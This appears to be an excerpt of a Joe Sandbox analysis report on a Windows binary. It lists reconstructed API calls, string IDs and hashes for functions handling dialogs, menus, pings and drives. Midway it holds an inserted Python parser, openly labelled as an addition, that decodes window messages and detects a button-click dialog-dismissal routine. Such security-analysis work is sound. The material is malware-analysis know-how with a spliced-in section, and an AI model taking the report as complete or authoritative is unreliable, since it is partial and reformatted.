                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: _wcscpy$CleanupStartup_memmove_strcatgethostbynamegethostnameinet_ntoa
                                                                          • String ID: 0.0.0.0
                                                                          • API String ID: 208665112-3771769585
                                                                          • Opcode ID: c560d4d889da2b301d577ddb18a8f63726ef28fcc62096e83cafe7e6f6073908
                                                                          • Instruction ID: 0bdfbb0faa44decd8efd56ee514d0c904e8d302a0caef300cc84155f06129032
                                                                          • Opcode Fuzzy Hash: c560d4d889da2b301d577ddb18a8f63726ef28fcc62096e83cafe7e6f6073908
                                                                          • Instruction Fuzzy Hash: 6711E7316041146FCB2BBB709C8AEDB77BCEF02711F0441BAF459DA0A1EF759E818A50
                                                                          APIs
                                                                          • timeGetTime.WINMM ref: 00374F7A
                                                                            • Part of subcall function 0033049F: timeGetTime.WINMM(?,75C0B400,00320E7B), ref: 003304A3
                                                                          • Sleep.KERNEL32(0000000A), ref: 00374FA6
                                                                          • EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00374FCA
                                                                          • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00374FEC
                                                                          • SetActiveWindow.USER32 ref: 0037500B
                                                                          • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00375019
                                                                          • SendMessageW.USER32(00000010,00000000,00000000), ref: 00375038
                                                                          • Sleep.KERNEL32(000000FA), ref: 00375043
                                                                          • IsWindow.USER32 ref: 0037504F
                                                                          • EndDialog.USER32(00000000), ref: 00375060
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Window$MessageSendSleepTimetime$ActiveDialogEnumFindThreadWindows
                                                                          • String ID: BUTTON
                                                                          • API String ID: 1194449130-3405671355
                                                                          • Opcode ID: 12a694fa2d78f429986a7084dd0a8bd45820b5e5f5c74f4ec1b8bcb4628d5d41
                                                                          • Instruction ID: cc7065178b25762f9eebbbc3bd48b912dcd76538f927387a56698ce5a629af1b
                                                                          • Opcode Fuzzy Hash: 12a694fa2d78f429986a7084dd0a8bd45820b5e5f5c74f4ec1b8bcb4628d5d41
                                                                          • Instruction Fuzzy Hash: 0D21F374206600AFE7235F30FC89B263B6EEB06745F05502AF009C11B4CB7A8E54CB61
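The record above (EnumThreadWindows, FindWindowExW on window class BUTTON, two SendMessageW calls, a short Sleep, EndDialog) is the call pattern of a routine that locates a dialog's button, presses it and closes the window; in WinUser.h the message value 0xF5 is BM_CLICK and 0x10 is WM_CLOSE. As an added example that is not part of the Joe Sandbox report, the Python below parses API-list lines in this report's format into structured calls, names the window messages passed to SendMessage/PostMessage, and checks whether a record contains that dismissal chain. The sample input is the API list of the record above copied verbatim; the message table, the ApiCall structure and the chain heuristic are this example's own assumptions, not anything Joe Sandbox provides. Because the static argument reconstruction can drop arguments (the second SendMessageW above shows only three), every argument is matched against the message table rather than trusting argument position.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample: the API list of the EnumThreadWindows record above, copied verbatim.
SAMPLE_RECORD = """\
• timeGetTime.WINMM ref: 00374F7A
  • Part of subcall function 0033049F: timeGetTime.WINMM(?,75C0B400,00320E7B), ref: 003304A3
• Sleep.KERNEL32(0000000A), ref: 00374FA6
• EnumThreadWindows.USER32(?,Function_00064F28,00000000), ref: 00374FCA
• FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00374FEC
• SetActiveWindow.USER32 ref: 0037500B
• SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00375019
• SendMessageW.USER32(00000010,00000000,00000000), ref: 00375038
• Sleep.KERNEL32(000000FA), ref: 00375043
• IsWindow.USER32 ref: 0037504F
• EndDialog.USER32(00000000), ref: 00375060
"""

# One API-list line: optional "Part of subcall function X:" prefix, Api.MODULE, optional (args), ref: ADDR
LINE_RE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<caller>[0-9A-F]+):\s*)?"
    r"(?P<api>[A-Za-z_]\w*)\.(?P<module>[A-Z0-9_]+)"
    r"(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)\s*$"
)

# Assumed message table (values from WinUser.h); extend as needed.
WINDOW_MESSAGES = {0x0010: "WM_CLOSE", 0x0112: "WM_SYSCOMMAND",
                   0x00F5: "BM_CLICK", 0x0173: "STM_GETIMAGE"}
MESSAGE_APIS = {"SendMessageW", "SendMessageA", "PostMessageW", "PostMessageA"}


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]
    ref: int                       # call-site address from the "ref:" field
    caller: Optional[int] = None   # set for "Part of subcall function" lines


def parse_api_line(line: str) -> Optional[ApiCall]:
    """Parse one bullet line; returns None for headings and other non-call lines."""
    m = LINE_RE.match(line)
    if not m:
        return None
    args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
    caller = int(m["caller"], 16) if m["caller"] else None
    return ApiCall(m["api"], m["module"], args, int(m["ref"], 16), caller)


def parse_record(text: str) -> List[ApiCall]:
    return [c for c in map(parse_api_line, text.splitlines()) if c is not None]


def hex_arg(a: str) -> Optional[int]:
    """Integer value of a reconstructed argument such as 000000F5 or -00000001; None for '?' or symbols."""
    neg = a.startswith("-")
    body = a[1:] if neg else a
    if not re.fullmatch(r"[0-9A-F]{1,8}", body):
        return None
    v = int(body, 16)
    return -v if neg else v


def message_names(call: ApiCall) -> List[str]:
    """Named window messages found among a SendMessage/PostMessage call's arguments (any position)."""
    return [WINDOW_MESSAGES[v] for v in map(hex_arg, call.args) if v in WINDOW_MESSAGES]


def decode_messages(calls: List[ApiCall]):
    """(call-site, [message names]) for every SendMessage/PostMessage call, in record order."""
    return [(c.ref, message_names(c)) for c in calls if c.api in MESSAGE_APIS]


def dialog_dismiss_chain(calls: List[ApiCall]) -> bool:
    """Heuristic: FindWindowExW for class BUTTON, then BM_CLICK, then WM_CLOSE, then EndDialog, in order.
    Subcall lines belong to another function and are ignored."""
    events = []
    for c in calls:
        if c.caller is not None:
            continue
        if c.api == "FindWindowExW" and "BUTTON" in c.args:
            events.append("FIND_BUTTON")
        elif c.api in MESSAGE_APIS:
            events.extend(message_names(c))
        elif c.api == "EndDialog":
            events.append("EndDialog")
    wanted = ["FIND_BUTTON", "BM_CLICK", "WM_CLOSE", "EndDialog"]
    i = 0
    for e in events:
        if i < len(wanted) and e == wanted[i]:
            i += 1
    return i == len(wanted)


if __name__ == "__main__":
    record = parse_record(SAMPLE_RECORD)
    for ref, names in decode_messages(record):
        print(f"{ref:08X}: {', '.join(names) or 'no known message constant'}")
    print("dialog auto-dismiss chain:", dialog_dismiss_chain(record))
```

The same parser works on any of the API lists in this report; only the `ref:` addresses and argument strings change. Arguments printed as `?` or as `Function_...` symbols come back as None from `hex_arg`, so they never produce a false message match.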
                                                                          APIs
                                                                            • Part of subcall function 00319837: __itow.LIBCMT ref: 00319862
                                                                            • Part of subcall function 00319837: __swprintf.LIBCMT ref: 003198AC
                                                                          • CoInitialize.OLE32(00000000), ref: 0037D5EA
                                                                          • SHGetSpecialFolderLocation.SHELL32(00000000,00000000,?), ref: 0037D67D
                                                                          • SHGetDesktopFolder.SHELL32(?), ref: 0037D691
                                                                          • CoCreateInstance.OLE32(003A2D7C,00000000,00000001,003C8C1C,?), ref: 0037D6DD
                                                                          • SHCreateShellItem.SHELL32(00000000,00000000,?,00000003), ref: 0037D74C
                                                                          • CoTaskMemFree.OLE32(?,?), ref: 0037D7A4
                                                                          • _memset.LIBCMT ref: 0037D7E1
                                                                          • SHBrowseForFolderW.SHELL32(?), ref: 0037D81D
                                                                          • SHGetPathFromIDListW.SHELL32(00000000,?), ref: 0037D840
                                                                          • CoTaskMemFree.OLE32(00000000), ref: 0037D847
                                                                          • CoTaskMemFree.OLE32(00000000,00000001,00000000), ref: 0037D87E
                                                                          • CoUninitialize.OLE32(00000001,00000000), ref: 0037D880
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: FolderFreeTask$Create$BrowseDesktopFromInitializeInstanceItemListLocationPathShellSpecialUninitialize__itow__swprintf_memset
                                                                          • String ID:
                                                                          • API String ID: 1246142700-0
                                                                          • Opcode ID: e08c5b9219a3efd79592938d9991aeb7ab2d711c2e097188bf42da8930330ad7
                                                                          • Instruction ID: c2b89073a1966b765d02180bb3629b26b6c810f763439d49e6f328a67f9b5a97
                                                                          • Opcode Fuzzy Hash: e08c5b9219a3efd79592938d9991aeb7ab2d711c2e097188bf42da8930330ad7
                                                                          • Instruction Fuzzy Hash: 0BB10B75A00109AFDB15DFA4C885EAEBBB9FF48314F148469F909EB261DB31ED41CB50
                                                                          APIs
                                                                          • GetDlgItem.USER32(?,00000001), ref: 0036C283
                                                                          • GetWindowRect.USER32(00000000,?), ref: 0036C295
                                                                          • MoveWindow.USER32(00000001,0000000A,?,00000001,?,00000000), ref: 0036C2F3
                                                                          • GetDlgItem.USER32(?,00000002), ref: 0036C2FE
                                                                          • GetWindowRect.USER32(00000000,?), ref: 0036C310
                                                                          • MoveWindow.USER32(00000001,?,00000000,00000001,?,00000000), ref: 0036C364
                                                                          • GetDlgItem.USER32(?,000003E9), ref: 0036C372
                                                                          • GetWindowRect.USER32(00000000,?), ref: 0036C383
                                                                          • MoveWindow.USER32(00000000,0000000A,00000000,?,?,00000000), ref: 0036C3C6
                                                                          • GetDlgItem.USER32(?,000003EA), ref: 0036C3D4
                                                                          • MoveWindow.USER32(00000000,0000000A,0000000A,?,-00000005,00000000), ref: 0036C3F1
                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 0036C3FE
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Window$ItemMoveRect$Invalidate
                                                                          • String ID:
                                                                          • API String ID: 3096461208-0
                                                                          • Opcode ID: 31b8867e4605bda15eaa267cc87eed4a8ae477181539aa0e87df5fcec099df39
                                                                          • Instruction ID: 3112e95dd8f284e835ee8ea6f1fce05c59a6e1530790f932ed9970d32a335665
                                                                          • Opcode Fuzzy Hash: 31b8867e4605bda15eaa267cc87eed4a8ae477181539aa0e87df5fcec099df39
                                                                          • Instruction Fuzzy Hash: 58517D71B00205AFDB09CFA9DD89ABEBBBAEB88310F14812DF915D7290D771DD008B10
                                                                          APIs
                                                                            • Part of subcall function 00311B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00312036,?,00000000,?,?,?,?,003116CB,00000000,?), ref: 00311B9A
                                                                          • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 003120D3
                                                                          • KillTimer.USER32(-00000001,?,?,?,?,003116CB,00000000,?,?,00311AE2,?,?), ref: 0031216E
                                                                          • DestroyAcceleratorTable.USER32(00000000), ref: 0034BCA6
                                                                          • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,003116CB,00000000,?,?,00311AE2,?,?), ref: 0034BCD7
                                                                          • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,003116CB,00000000,?,?,00311AE2,?,?), ref: 0034BCEE
                                                                          • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,003116CB,00000000,?,?,00311AE2,?,?), ref: 0034BD0A
                                                                          • DeleteObject.GDI32(00000000), ref: 0034BD1C
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                          • String ID:
                                                                          • API String ID: 641708696-0
                                                                          • Opcode ID: ed83f77f035e909fc61b25f0dcab4108d4cb07cdfe585a2e6c702c82e88c79e2
                                                                          • Instruction ID: d0a0aab3ec0e42e13b1edb4f34cd33d3e4742ca143a07c833650486ec3157268
                                                                          • Opcode Fuzzy Hash: ed83f77f035e909fc61b25f0dcab4108d4cb07cdfe585a2e6c702c82e88c79e2
                                                                          • Instruction Fuzzy Hash: 41617D31601A00DFDB3B9F14E948B6AB7F9FF49312F11452AE5428AA70C771BCA4EB50
                                                                          APIs
                                                                            • Part of subcall function 003125DB: GetWindowLongW.USER32(?,000000EB), ref: 003125EC
                                                                          • GetSysColor.USER32(0000000F), ref: 003121D3
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: ColorLongWindow
                                                                          • String ID:
                                                                          • API String ID: 259745315-0
                                                                          • Opcode ID: 52c846119423ce426ab540df10609a657d022f935c8da7e712907294343a0ab3
                                                                          • Instruction ID: 9998cb777883715d25b7c3117555693a03d06a02fe233fc9a5848150d07be6ec
                                                                          • Opcode Fuzzy Hash: 52c846119423ce426ab540df10609a657d022f935c8da7e712907294343a0ab3
                                                                          • Instruction Fuzzy Hash: 534194311005449FDB2B5F28EC88BFA3B69EB4A331F194266FD658E1E1C7328C92DB51
                                                                          APIs
                                                                          • CharLowerBuffW.USER32(?,?,0039F910), ref: 0037A90B
                                                                          • GetDriveTypeW.KERNEL32(00000061,003C89A0,00000061), ref: 0037A9D5
                                                                          • _wcscpy.LIBCMT ref: 0037A9FF
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: BuffCharDriveLowerType_wcscpy
                                                                          • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                          • API String ID: 2820617543-1000479233
                                                                          • Opcode ID: 6ba8d301178de604414e4b61a9f4225d8eea5f6a0bc83168ac9c83a290f70876
                                                                          • Instruction ID: 02121c0083b6341025d548b72ed98162d4537e6e19e88a7c96d6b880eb8099ce
                                                                          • Opcode Fuzzy Hash: 6ba8d301178de604414e4b61a9f4225d8eea5f6a0bc83168ac9c83a290f70876
                                                                          • Instruction Fuzzy Hash: 9D519F311083019BC71AEF14C892AAFB7E9EFC5300F15882DF5999B2A2DB319D49CB53
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: __i64tow__itow__swprintf
                                                                          • String ID: %.15g$0x%p$False$True
                                                                          • API String ID: 421087845-2263619337
                                                                          • Opcode ID: 1ae361fdb79b33f21f94e94c5bf92c1c9f190c13b29cb328c7b6b89702d4e688
                                                                          • Instruction ID: c2a84370e6df90e976da7e90e131b06a822b581942581c7d387d55cd833b3fa3
                                                                          • Opcode Fuzzy Hash: 1ae361fdb79b33f21f94e94c5bf92c1c9f190c13b29cb328c7b6b89702d4e688
                                                                          • Instruction Fuzzy Hash: FC41DB715042099FDB2ADF34D852FB673E8FF4A310F2444AEE549DF291EA31A9418710
                                                                          APIs
                                                                          • _memset.LIBCMT ref: 0039716A
                                                                          • CreateMenu.USER32 ref: 00397185
                                                                          • SetMenu.USER32(?,00000000), ref: 00397194
                                                                          • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00397221
                                                                          • IsMenu.USER32(?), ref: 00397237
                                                                          • CreatePopupMenu.USER32 ref: 00397241
                                                                          • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0039726E
                                                                          • DrawMenuBar.USER32 ref: 00397276
                                                                          Memory Dump Source
                                                                          • Source File: 00000000.00000002.1722343487.0000000000311000.00000020.00000001.01000000.00000003.sdmp, Offset: 00310000, based on PE: true
                                                                          • Associated: 00000000.00000002.1722089312.0000000000310000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.000000000039F000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722424508.00000000003C4000.00000002.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722499677.00000000003CE000.00000004.00000001.01000000.00000003.sdmp
                                                                          • Associated: 00000000.00000002.1722519596.00000000003D7000.00000002.00000001.01000000.00000003.sdmp
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_0_2_310000_njVvgA8pEB.jbxd
                                                                          Similarity
                                                                          • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                          • String ID: 0$F
                                                                          • API String ID: 176399719-3044882817
                                                                          • Opcode ID: 4fffdbdfbba024d71dd71a2b3588bd2c8345db9a2d4a22e3c330f91061972285
                                                                          • Instruction ID: 1319a5d717e2d0000684dfef09fb0a9fa031f36533c1ce60c8013fae1db82b01
                                                                          • Opcode Fuzzy Hash: 4fffdbdfbba024d71dd71a2b3588bd2c8345db9a2d4a22e3c330f91061972285
                                                                          • Instruction Fuzzy Hash: AC414775A11205EFDF22DFA4D884EDA7BB9FF49310F150429F945A73A1D732A910CB90
APIs
• MoveWindow.USER32(?,?,?,000000FF,000000FF,00000000,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?), ref: 0039755E
• CreateCompatibleDC.GDI32(00000000), ref: 00397565
• SendMessageW.USER32(?,00000173,00000000,00000000), ref: 00397578
• SelectObject.GDI32(00000000,00000000), ref: 00397580
• GetPixel.GDI32(00000000,00000000,00000000), ref: 0039758B
• DeleteDC.GDI32(00000000), ref: 00397594
• GetWindowLongW.USER32(?,000000EC), ref: 0039759E
• SetLayeredWindowAttributes.USER32(?,00000000,00000000,00000001), ref: 003975B2
• DestroyWindow.USER32(?,?,?,000000FF,000000FF,?,?,static,00000000,00000000,?,?,00000000,00000000,?,?), ref: 003975BE
Similarity
• API ID: Window$AttributesCompatibleCreateDeleteDestroyLayeredLongMessageMoveObjectPixelSelectSend
• String ID: static
• API String ID: 2559357485-2160076837
• Opcode ID: 74b5d4553ab586aa0e3a23b946c58366ea680aa441b35541fc41cb0d8195d450
• Instruction ID: d652469a50a87a635c6762b6a41738986191d15ed14b52fc7d561b65cd29d170
• Opcode Fuzzy Hash: 74b5d4553ab586aa0e3a23b946c58366ea680aa441b35541fc41cb0d8195d450
• Instruction Fuzzy Hash: 72312772115215AFDF129FA4DC09FEA3B6DEF0A360F164225FA15E61E0C732D821DBA4
APIs
• _memset.LIBCMT ref: 00336E3E
  • Part of subcall function 00338B28: __getptd_noexit.LIBCMT ref: 00338B28
• __gmtime64_s.LIBCMT ref: 00336ED7
• __gmtime64_s.LIBCMT ref: 00336F0D
• __gmtime64_s.LIBCMT ref: 00336F2A
• __allrem.LIBCMT ref: 00336F80
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00336F9C
• __allrem.LIBCMT ref: 00336FB3
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00336FD1
• __allrem.LIBCMT ref: 00336FE8
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00337006
• __invoke_watson.LIBCMT ref: 00337077
Similarity
• API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
• String ID:
• API String ID: 384356119-0
• Opcode ID: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
• Instruction ID: ecc1b2d5216efb905ae84b5cd1161739aab28f3fc2723a319e09e7ed1b7198a3
• Opcode Fuzzy Hash: 1572197e9c4cf49d3ac3c19b6e82465e4eefa01e3d88f7bbd38cf7a66862b9c5
• Instruction Fuzzy Hash: 3371D9B6A00716ABD726AF69DCC2B5AB3F8AF04724F148539F514DB681E770ED048B90
APIs
• _memset.LIBCMT ref: 00372542
• GetMenuItemInfoW.USER32(003D5890,000000FF,00000000,00000030), ref: 003725A3
• SetMenuItemInfoW.USER32(003D5890,00000004,00000000,00000030), ref: 003725D9
• Sleep.KERNEL32(000001F4), ref: 003725EB
• GetMenuItemCount.USER32(?), ref: 0037262F
• GetMenuItemID.USER32(?,00000000), ref: 0037264B
• GetMenuItemID.USER32(?,-00000001), ref: 00372675
• GetMenuItemID.USER32(?,?), ref: 003726BA
• CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 00372700
• GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00372714
• SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00372735
Similarity
• API ID: ItemMenu$Info$CheckCountRadioSleep_memset
• String ID:
• API String ID: 4176008265-0
• Opcode ID: 51bf5320a13302c6b58f6d1d3f43b542602d42cc3c0a42c281e3e4c3cd2c5f18
• Instruction ID: f5ccfc0669adc0b0974ab368e0a5d9ab9d503c804645fb9822ca357ead3598c5
• Opcode Fuzzy Hash: 51bf5320a13302c6b58f6d1d3f43b542602d42cc3c0a42c281e3e4c3cd2c5f18
• Instruction Fuzzy Hash: F3619D70900289AFDB27CF64DD88EBFBBBCEB06304F15845AE845A7251D779AD05DB20
APIs
• SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 00396FA5
• SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 00396FA8
• GetWindowLongW.USER32(?,000000F0), ref: 00396FCC
• _memset.LIBCMT ref: 00396FDD
• SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00396FEF
• SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 00397067
Similarity
• API ID: MessageSend$LongWindow_memset
• String ID:
• API String ID: 830647256-0
• Opcode ID: 58ddc9b180bd690119060ffa9da8ac87da1fbc8b1b213a24ce5c4f53d687db8f
• Instruction ID: 90d415238a4daf1129356a9ce9983f96a4a8c3a55272ba26f8b3ed9eb990b938
• Opcode Fuzzy Hash: 58ddc9b180bd690119060ffa9da8ac87da1fbc8b1b213a24ce5c4f53d687db8f
• Instruction Fuzzy Hash: D6615B75A00208AFDB12DFA4DC81EEE77F8EB09710F10415AFA15EB2A1C771AE45DB90
APIs
• SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,?,?), ref: 00366BBF
• SafeArrayAllocData.OLEAUT32(?), ref: 00366C18
• VariantInit.OLEAUT32(?), ref: 00366C2A
• SafeArrayAccessData.OLEAUT32(?,?), ref: 00366C4A
• VariantCopy.OLEAUT32(?,?), ref: 00366C9D
• SafeArrayUnaccessData.OLEAUT32(?), ref: 00366CB1
• VariantClear.OLEAUT32(?), ref: 00366CC6
• SafeArrayDestroyData.OLEAUT32(?), ref: 00366CD3
• SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00366CDC
• VariantClear.OLEAUT32(?), ref: 00366CEE
• SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 00366CF9
Similarity
• API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
• String ID:
• API String ID: 2706829360-0
• Opcode ID: 9f2e995f508faa32482550a7d9c1e9c5591c51983ca430f493060d01851e3eb7
• Instruction ID: 59829b43f9f2ec9ad4058eae4c6e2df5fe66585c50333fa55806ecfac5d14566
• Opcode Fuzzy Hash: 9f2e995f508faa32482550a7d9c1e9c5591c51983ca430f493060d01851e3eb7
• Instruction Fuzzy Hash: AC415E71A002199FCF06DFA9D8459EEBBBDEF48354F00C06AE955EB261CB31A945CB90
APIs
• WSAStartup.WSOCK32(00000101,?), ref: 00385793
• inet_addr.WSOCK32(?,?,?), ref: 003857D8
• gethostbyname.WSOCK32(?), ref: 003857E4
• IcmpCreateFile.IPHLPAPI ref: 003857F2
• IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 00385862
• IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 00385878
• IcmpCloseHandle.IPHLPAPI(00000000), ref: 003858ED
• WSACleanup.WSOCK32 ref: 003858F3
Similarity
• API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
• String ID: Ping
• API String ID: 1028309954-2246546115
• Opcode ID: 297b5293f98f32cafe4b9421cb7ba043485d4a5dbf1475913d529fba416c1750
• Instruction ID: 0b86ddad4cd5af03e558992c8934c26e71710726bd899c094ff8f16f8e42e8c0
• Opcode Fuzzy Hash: 297b5293f98f32cafe4b9421cb7ba043485d4a5dbf1475913d529fba416c1750
• Instruction Fuzzy Hash: 4B518E31604700DFDB12EF24DC45B6AB7E8EF48710F04896AF956DB2A1DB70E940CB42
APIs
• SetErrorMode.KERNEL32(00000001), ref: 0037B4D0
• GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 0037B546
• GetLastError.KERNEL32 ref: 0037B550
• SetErrorMode.KERNEL32(00000000,READY), ref: 0037B5BD
Similarity
• API ID: Error$Mode$DiskFreeLastSpace
• String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
